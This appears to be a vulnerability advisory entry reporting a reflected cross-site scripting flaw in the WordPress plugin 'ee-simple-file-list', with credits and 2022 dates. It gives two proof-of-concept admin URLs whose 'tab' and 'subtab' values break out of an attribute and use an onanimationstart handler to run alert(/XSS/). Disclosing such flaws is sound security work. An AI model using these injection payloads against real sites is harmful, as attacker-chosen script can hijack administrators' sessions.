The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=ee-simple-file-list&tab="style=animation-name:rotation+onanimationstart=alert(/XSS/)// https://example.com/wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Raad Haddad of Cloudyrion GmbH
Raad Haddad of Cloudyrion GmbH
Yes
2022-08-30 (about 1 years ago)
2022-08-30 (about 1 years ago)
2022-08-30 (about 1 years ago)